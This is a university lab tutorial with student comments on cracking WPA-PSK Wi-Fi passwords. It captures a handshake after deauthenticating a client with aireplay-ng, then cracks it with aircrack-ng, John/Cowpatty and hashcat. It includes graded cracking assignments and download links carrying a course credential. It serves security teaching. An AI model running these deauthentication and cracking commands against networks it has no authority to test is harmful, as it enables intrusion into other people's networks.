WPA encryption cracking with dictionary attacks

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

This tutorial explains how to crack wireless networks encrypted with WPA by using dictionary attacks. For this tutorial, you are supposed to have two machines (virtual or physical) with wireless interfaces and wireless access point, e.g. WiFi router. One of the machines will be used as a client and another one as an attacker. In this tutorial, we assume that you install Kali Linux on the attacker machine. WiFi router must support WPA encryption. To the best of our knowledge, VirtualBox cannot simulate wireless networking, for this reason, this tutorial should be done by using real network devices. However, you can use virtual machines you configured earlier as it will be described further in the tutorial.

Despite the tutorial requires for you to have some physical devices, the assignments below can be completed without carrying out the attack described! You can just look through the tutorial and maybe find and watch a video of this attack performed by someone, no need to execute it yourself. Obviously, you will have less fun :)

The remainder of this tutorial is organized as follows. Preliminary questions are listed in Section 2. Configuration of the wireless router, the attacker and the client are presented in Section 3. The dictionary attack is demonstrated in Section 4. In Section 5, the dictionary attack is combined with brute forcing. Some simple assignments are listed in Section 6. Section 7 concludes the tutorial.

This tutorial (including assignments) takes on average 7.96 hours to complete.

2. Preliminary questions

What do the following abbreviations mean: AP, ESSID, BSSID?
What are WPA-PSK/WPA2-PSK, TKIP and AES?
What are the weakest features of the WPA-PSK?
What are simple measures that you can take to secure your WiFi?
What are brute force and dictionary attacks?
Why the pure brute force technique is not effective for WPA cracking?
What is a hybrid attack in this context?

3. Network configuration

As it was mentioned in the introduction, you are required to have real wireless network devices to complete this tutorial.

3.1 Wireless access point

Below are the options how you can create the access point:

Option 1:

You can use your home WiFi router:

Is there any other way to complete this task? I am doing this from my PC and dont have any laptop in use. I can not go to JYU campus, since I work at the same time. My PC do not have inner wi-fi so I use my USB Dongle whole time. If I choose option 1 --> Insert your WiFi USB adapter into the host PC. We do assume here that this adapter is not primary interface of the host PC, i.e. there at least one more network interface on your host PC that is either physical or wireless. Using that dongle is my only option to get network. I do not have any other ways. What to do?

— 30 Sep 23 (edited 30 Sep 23)

Open your router settings, the web-page with the settings usually is on 192.168.1.1.

Change the name of the wireless network name (SSID) to "dd-wrt" (you can choose another name, but, in this tutorial, we assume it is named this way).

Just answer questions in the assignemnts, most (all?) of the questions can be answered without carrying out the attack

— 30 Sep 23 (edited 09 Oct 23)

I had a similar situation to the above mentioned one and used the method described in the answer to it: "Just answer questions in the assignemnts, most (all?) of the questions can be answered without carrying out the attack", in both this assignment and the next one too (number 10) - since it practically had the same difficulty.

— 17 Oct 23

Disable SSID broadcast. It will cause additional problem for the attacker to find the wireless network name.

Go to wireless security settings and set the wireless security mode as WPA Personal (WPA PSK) and input a password. For the sake of demonstration, we assume that the password is "labra123".

Save and apply new settings.

Option 2:

You can use your smartphone as the access point. How to configure the access point with the smartphone strongly depends on the smartphone's operating system and manufacturer, and it is beyond the scope of this tutorial. Your resulting smartphone-based access point should be configured as follows:

SSID: "dd-wrt"
SSID broadcast: disabled (disabling SSID broadcast is not mandatory)
Wireless security mode: WPA Personal (WPA-PSK)
WPA password: "labra123"

The last option:

We do encourage you to try one of the options described above. However, if you do not possess the devices required, you can come to our lab (Agora C331.1) and complete the tutorial here. We have everything: WiFi routers, WiFi dongles and laptops with Kali. Let us know in advance what day and time you would like to come.

3.2 Attacker

You are required to have a Kali machine that has wireless interface. Below are the options how you can create the attacker:

Option 1 (not recommended):

If you have wireless USB adapter (WiFi dongle), you can use your virtual Kali attacker configured in previous tutorials of the course. The main advantage of such approach is that you do not have to install Kali to any machine since you already have the virtual one. The drawback is that you do need a WiFi USB adapter. Even if you work on a laptop with built-in WiFi module, you will need a WiFi dongle, since your virtual machine will consider laptop's WiFi module as a cable connection, but you need a wireless one. Second, since Kali is not designed for common use, it includes drivers only for devices of very common manufacturers, as a result, there is a probability that you will need to install some specific drivers on your virtual Kali machine to make it work with the USB WiFi adapter.

However, the main reason why we do not recommend this option is that Kali WiFi applications especially aircrack-ng do not work well with virtual machines. In this particular tutorial, you most likely will not have any problems using virtual attacker, but in the next one, you probably will.

If you pick this option, below are few steps how to add a wireless interface to your virtual Kali:

Download VirtualBox extension pack from VirtualBox web site. Make sure that the extension pack version matches your VirtualBox version. Install it.
In Windows everything should work out of the box. If your host PC is Linux, you have to add your username to the vboxusers group:
```
 $ sudo usermod -aG vboxusers <your username>
```
substitute <your username> with your actual username. Log off and back in to finalize the change in permissions.

Insert your WiFi USB adapter into the host PC. We do assume here that this adapter is not primary interface of the host PC, i.e. there at least one more network interface on your host PC that is either physical or wireless.

Run your virtual gateway and Kali attacker.

On Kali attacker, check the list of network interfaces:
```
$ ip a
```
there should be only one eth0 (it may have a different name in your case and of course we do not count "lo").

Go to VirtualBox settings of Kali attacker, namely Devices -> USB. There should be the list of all USB devices connected to your host PC that may include keyboard, mouse, etc. Find your USB WiFi adapter and click on it.

On Kali-VM, check again the list of network interfaces:
```
 $ ip a
```
there should appear one more device, in my case it was called wlan0, but the name can differ. Now you have two network interfaces on Kali, one of which is wireless. The configuration is complete.

One important issue: when your wireless USB adapter is used by a virtual machine, your host PC cannot use it at the same time, that is why you need to have at least one more network interface on your host PC.

Option 2 (recomended):

If you do not have WiFi USB adapters, but a laptop with built-in WiFi module, you can create and use Kali live USB. The advantage of this approach is that you do not need to have WiFi dongles, but you do need a USB stick with at least 8 Gb that will be formatted in the process. Once again, there is risk, that you have to install some specific drivers on Kali machine to make it work with your laptop's WiFi module. Since you will use wireless interface for the attack, you will need wire network interface to be able to connect to the Internet to download some files and packages. If your laptop does not have the wire interface, we recommend to complete this and the next tutorials in the lab. Below are the steps how to create the attacker with Kali live USB:

Create bootable Kali USB as described on Kali web site.

Boot the laptop from USB. You can do it by configuring "Boot menu", that can be opened during few first seconds, when the laptop starts up.

When you boot to Kali, you can either install it on the laptop together with your current operating system (only in case you know how to do it), or you can just continue working in the "live" mode. If you decide to actually install Kali, but your laptop does not have CD drive, you may face the problem that the installation requires CD-ROM. This is well-known bug, you can search in the Internet for a solution. In Linux, I managed to solve it by using "isohybrid" when creating bootable USB. Probably you can get around this by simply using "Graphical Install" when you boot Kali USB.

When you load to Kali, check the list of network interfaces:
```
$ ip a
```
there should be at least two devices (we do not count "lo" of course). In my case, those were eth0 and wlan0, but the names can differ in your case. Now you have two network interfaces on Kali, one of which is wireless. The configuration is complete.

The last option:

We do encourage you to try one of the options described above. However, if you do not possess the devices required, you can come to our lab (Agora C331.1) and complete the tutorial here. We have everything: WiFi routers, WiFi dongles and laptops with Kali. Let us know in advance what day and time you would like to come.

3.3 Client

Similar to the attacker, client requires one wireless interface and can be configured using one of the options described in the previous subsection. However, the client needs just one network interface. For this purpose, you can just use your smartphone (if it is not used as the access point in this tutorial) or tablet, if it does have WiFi module. If you want to make the client be a virtual machine, you will need another WiFi dongle, because VMs cannot use the same dongle at the same time.

Create a wireless connection on the client. The way highly depends on the operating system of the client.

In this connection, input the name of your wireless network ("dd-wrt"), set the security mode as WPA Personal and input your password ("labra123"). Enable auto-reconnect for this network and disable for others if there are any.

Connect to the hidden network dd-wrt and stay connected during the attack.

4. Dictionary Attack

Open a terminal on the attacker machine with Kali Linux and type
```
$ sudo airmon-ng
```
It will show you all wireless interfaces of your system, e.g. wlan0, wlan1, etc and their statuses. You should choose one of the interfaces which will be used for the attack. In this tutorial, the interface wlan0 is used.

Type
```
$ rfkill list
```
and check that wireless LAN is not blocked (in my case, it was hard blocked by default). If yes, unblock it by typing:
```
$ rfkill unblock wifi
```
Otherwise, just skip this step.
Type in the terminal
```
$ sudo airmon-ng check kill
```
to kill services that may interfere with airmon-ng.

Disable wlan0 interface:
```
$ sudo ifconfig wlan0 down
```

Spoof the mac address of the wireless interface selected:
```
$ sudo macchanger --mac 00:11:22:33:44:55 wlan0
```

Restart the interface wlan0 with new mac:
```
$ sudo airmon-ng start wlan0
```
It will put your card into monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only "hear" packets addressed to you. In addition, monitor mode allows you to inject packets. In the case of success, you should see that monitor mode is enabled on wlan0.

Using the interface "wlan0" (the name can change in your case, e.g. it can become "wlan0mon") start monitoring available wireless networks by typing:
```
$ sudo airodump-ng wlan0
```
If you have the following error:
```
Device or resource busy
```
try to kill NetworkManager by typing
```
$ sudo kill <PID>
```
where <PID> is NetworkManager process ID.

In the case of success, you will see the list of available wireless networks. If the list of available networks is empty (it happened to me once, but I could not repeat this bug), try simply to stop the monitor interface and start again:
```
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng start wlan0
```
and then
```
$ sudo airodump-ng wlan0
```
If the list is empty when you use a USB WiFi dongle, try to unplug it and then plug again.

In the case of success, find the network corresponding to the WiFi router you have configured:
- Its BSSID must be equal to the MAC address of the router
- Encryption mode is WPA
- ESSID is hidden (in our case it can be named <length: 6>, because wireless network name "dd-wrt" has 6 symbols; sometimes it is named <length: 0>).
Please make sure that you pick the network corresponding to your router, but not the one belonging to your neighbour! :) Once you have found the target network, check what channel it uses. This information is needed for the next step. Hit CTRL+C to cancel the running airodump.

Configure airodump-ng to watch the target network, capture the unique data holding the password and put it into a file:
```
$ sudo airodump-ng -c <channel> -w <filename> --bssid <BSSID> <interface>
```
For example, in my case it looks as follows:
```
$ sudo airodump-ng -c 6 -w wpacrack --bssid 58:6D:8F:6B:28:81 wlan0
```
It will start monitor the target network and put all the data into file "wpacrack-01.cap" in your current directory. As the output you will see two parts. The first one contains information about your wireless network: BSSID, data, channel, encryption, etc. The second part contains information about clients connected to this network. In particular, one can see the client MAC address in the column STATION, which is needed for the next step of the attack. If the part corresponding to the clients is empty, try to open several web pages on the client machine which is connected to the target wireless network.

To get the hidden ESSID we have to de-authenticate the client and get the ESSID during client's re- authentication. For this purpose, open the second terminal on the attacker machine and type:
```
$ sudo aireplay-ng -0 1 -a <access point's BSSID> -c <client's MAC> <interface>
```
For example, in my case it looks as follows:
```
$ sudo aireplay-ng -0 1 -a 58:6D:8F:6B:28:81 -c C4:17:FE:F8:BE:C7 wlan0
```

Switch back to the first terminal window that still has airodump-ng running. In case of success, you will see the name of the target wireless network ("dd-wrt") in plain language. In addition to that, in the top right corner of terminal you are supposed to see the following message:
```
WPA handshake: (BSSID)
```
where BSSID is the MAC address of your access point. This means that the authentication handshake has been captured. There also should be EAPOL label in Notes column. If the handshake message did not appear, try to run the command in step 11 one more time, generate some web traffic from the client, and run the command from step 11 again. If it does not help, repeat steps 8 - 12.

In the case of success, hit CTRL+C to cancel the running airodump.

Airmon might jam your network connections. If you can't access to the Internet after these, reboot Kali. If you use live version, before rebooting Kali, save your "wpacrack-01.cap" on an external drive or USB stick.

Download the password list:
```
$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/password.lst
```
It is not compulsory to use this word list. There are plenty of word lists in the Internet and you are encouraged to use some of them.

Install leafpad (what's wrong with gedit? no idea...):
```
$ sudo apt install leafpad
```
and open file with passwords:
```
$ leafpad password.lst
```
Search (Ctrl+F) for your password (labra123) in the list, and, if it is not there, add it manually somewhere in the middle of the list for the sake of demonstration.

Start a dictionary attack against a WPA key as follows:
```
$ sudo aircrack-ng -e <ESSID> -w <dictionary_file> <capture_file.cap>
```
that in our case looks like similar to:
```
$ sudo aircrack-ng -e dd-wrt -w password.lst wpacrack-01.cap
```
Wait for a while and the password will be found.

5. Rule-based extension of the dictionary attack

The obvious limitation of the technique described in the previous section is the existence of the key within the dictionary file used for the attack. To extend the list of possible keys, we can use word list mangling rules to generate permutations and common password additions from a simple dictionary file.

5.1 John and Cowpatty

Let us assume that our password "labra123" is not presented in the word list, but word "labra" is there. Open file "password.lst" with leafpad
```
$ leafpad password.lst
```
and substitute "labra123" with simple "labra". Thus, the standard dictionary attack with word list from "password.lst" would not be effective.

To create rules for generating new words from the password list application John The Ripper can be used. John comes with a built-in set of rules that is fairly limited, but uses a well documented "regex-esque" syntax that allows you to define your own rules. Let us add new rules according to which three digits will be added to the end of each word in the password list.

Install john:
```
$ sudo apt install john
```
Open file "john.conf" in directory "/etc/john" (directory name can be different in different versions of Kali):
```
$ sudo leafpad /etc/john/john.conf
```
You can also open it in leafpad instead of nano to find the required section faster. Find section [List.Rules:Wordlist]. It corresponds to the rules which are applied to word lists. As you can see it already contains several rules. Add the following line to the end of this section:
```
$[0-9]$[0-9]$[0-9]
```
It will add any combination of three digits to the end of each word in the word list.

For the sake of cracking acceleration, you can comment all other lines in this section with symbol "#". Another thing you can do to accelerate the process is removing one of those "$[0-9]" parts. In this case, you obviously also have to add "labra1" to the password list, otherwise the password will not be found. Save changes.

We can apply our mangling rule and find the password with the help of Aircrack. However, to demonstrate another Kali application, we use Cowpatty. It automates the dictionary attack for WPA-PSK. First, install it as follows:
```
$ sudo apt install cowpatty
```
The program can be started using a command-line interface, specifying a word list that contains the pass- phrase, a dump file that contains the WPA handshake, and the ESSID of the network. Run the following command in the terminal (there is space between "-" and "-r" in the command):
```
$ john --wordlist=<password_list> --rules --stdout | cowpatty -s <ESSID> -f - -r 
<capture_file-01.cap>
```
which in our case looks as follows:
```
$ john --wordlist=password.lst --rules --stdout | cowpatty -s dd-wrt -f - -r 
wpacrack-01.cap
```
Wait a few minutes and the password "labra123" will be found.

5.2 Hashcat

Another tool for WPA password brute-forcing is Hashcat. Hashcat comes with a set of rules that is fairly limited, but uses a well documented syntax that allows you to define your own rules.

Install Hashcat on the attacker (if it is not installed) by typing:
```
$ sudo apt update
```
```
$ sudo apt install hashcat
```

Next, install hashcat tools:
```
$ sudo apt install hcxtools
```

Convert the capture file to hash format 22000:

$ hcxpcapngtool -o hash.hc22000 wpacrack-01.cap

Assuming we know that the password is 8 symbols long we can run hashcat against our capture file in the pure brute-force mode as follows:
```
$ hashcat -m 22000 hash.hc22000 -a 3 ?a?a?a?a?a?a?a?a -o cracked --potfile-disable
```
where "-a 3" means we are using Brute Force Attack mode, "?a" is the mask of an unknown symbol, "-o" is the output file for the password and "--potfile-disable" disables storing the hashes in the potfile. This will take some time though.

Since our password has three digits after "labra", we can significantly accelerate the search by running hashcat as follows:
```
$ hashcat -m 22000 hash.hc22000 -a 3 labra?d?d?d -o cracked --potfile-disable
```
where "?d" stands for a unknown digit. The password, if found, will be stored in file "cracked":
```
$ cat cracked
```
Below is the list of charset combinations that can be used with hashcat:
```
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !#$%&’()*+,-./:;?@[\]ˆ_‘{|} ̃
?a = ?l?u?d?s
```

A dictionary attack using Hashcat can be carried out as follows:

$ hashcat -m 22000 hash.hc22000 password.lst -o cracked --potfile-disable

Finally, a rule-based extension of the dictionary attack can be carried out as follows (one line):
```
$ hashcat -m 22000 hash.hc22000 password.lst -r /usr/share/hashcat/rules/best64.rule -o 
cracked --potfile-disable
```
where "-r /usr/share/hashcat/rules/best64.rule" points to the file with dictionary word manipulation rules.

6. Assignment (5p.)

6.1 Preliminary

Complete the test based on the preliminary questions (1 point).

# wpabrute_basic1

6.2 Basic

Read the advises below on how to choose a secure password for WiFi. Taking into account the information given in this tutorial, which of them do you think are good and which are not really?

# wpabrute_basic2

In order to crack a WiFi network, an attacker can first try to collect some personal information about the victim and then use these pieces of information discovered in order to accelerate the search for password procedure.

Let's assume we know that:

Alice's WiFi network SSID is "dd-wrt"
The password for the Alice's network starts with her name with the case of some letters in the name being toggled, e.g. "aLicE"
The name in the password is followed by Alice's year of birth

First, download the WPA handshake captured in the same manner as it was demonstrated in the tutorial:

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/wpa_alice.zip

Crack Alice's password by using John The Reaper, Hashcat or any other password brute-force tool applied to the handshake file captured. If you choose John, here is a good guide with examples. Copy-paste the password cracked into the answer box below.

Alice's password (1 point):

# wpabrute_basic3

Read about the cracking tool called Reaver. What vulnerability this tool takes advantage of? How to protect yourself against Reaver attacks? Try to crack WPA/WPA2-PSK with this tool, if your WiFi router supports WPS. Otherwise, you can just read any of the WPS attack tutorials that can be found in the Internet, e.g. here or there. Complete the test below based on the questions asked.

# wpabrute_basic4

Next, read article on "Using Multiscale Traffic Analysis to Detect WPS Attacks". What approach is used in the article to detect Reaver attacks? Complete the test below devoted to the article results.

# wpabrute_basic5_

6.3 Advanced

Download the WPA handshake captured in the Bob's WiFi network "dd-wrt":

$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/wpa_bob.zip

This feels like a very time-consuming task, if only some consonants and vowels are replaced - not all. Can you provide any tips for how to face the "some" aspect..? Have already tried both hashcat and john, but I can't progress. :/

— 13 Oct 23

To crack Bob's password the attacker collects the following information about Bob, e.g. via social engineering:

He is from Tampere
He has a dog named Bear
His favorite team is Liverpool
He drives Porsche
He likes to spend holidays in Italy

Crack Bob's WiFi password if we know that:

The password is a combination of 2 or 3 keywords from the ones highlighted above
Some consonants in the password are in uppercase, and some are in lowercase
Some vowels can be munged as follows: "a" -> "@", "e" -> "3", "i" -> "1" or "!", and "o" -> "0"

Here are some clarifications. "A combination of 2 or 3 keywords" means 2 or 3 words without repetition, i.e. one word can be used only once in the password, e.g. "TampereTampere" and "BearBearBear" are not valid passwords. "Some consonants are in uppercase, and some are in lowercase" means that if there are for example two consonants of the same kind in the password, then one of them can be munged while another is not, or they can be both munged or they can be both not munged, e.g. "tamperebear", "tamperebeaR", "tampeRebear" and "tampeRebeaR" are all valid passwords. The same applies to vowels' munging. Finally, capital "i" in "Italy" can be munged the same way as small "i", i.e. it can become "1" or "!" or remain "I".

As previously, you can use John, Hashcat or any other password brute-force tools. Alternatively you can generate a dictionary with some scripting language and then run it against the capture file. Copy-paste the password cracked into the answer box below.

Bob's password (2 points):

Generate the wordlist containing all possible passwords e.g. using python, test it with hashcat, easy!

— 13 Oct 23

Never tell me the odds? Good luck for anyone trying to guess this. I might be wrong but I estimated that there are about 2,8 billion possibilities for this one. Might take a while to run them all :D

— 14 Oct 23

Just to clarify: Is the capital "I" of Italy the only capital letter than can change? In other words, can the capitalized consonants of the other words also be lowercase? ofc they can

EDIT: Aren't there billions of combinations? At least my Kali can only process about a thousand in a few seconds, I don't think the intention is for my PC to run doing only this task for days. Is there a way to considerably speed things up or are we misunderstanding something?

— 15 Oct 23 (edited 16 Oct 23)

Please do not waste time on writing comments here, you have billions of passwords to check :)

On a serious note: there should be much less possible combinations than 2.8 billion, not sure where this estimate comes from.

Hashcat can check 100kk words in 5 minutes on a more or less powerful pc.

— 16 Oct 23 (edited 16 Oct 23)

# wpabrute_advanced

6.4 General comments and feedback

Let us know how many hours in total have you spent on this assignment:

# wpabrute_time

On a scale from 1 to 10, estimate how interesting and difficult was the tutorial:

# wpabrute_interest

# wpabrute_difficulty

You can also give us some general feedback:

# wpabrute_feedback

7. Conclusion

Despite the fact, that pure brute force is not effective against WPA encryption mode, attackers might be able to crack it with the help of different dictionary attacks. In this tutorial, this type of the attack is demonstrated. For this purpose, we have used various Kali applications such as Aircrack, Cowpatty, John The Ripper and Hashcat.

More information on the topic can be found at: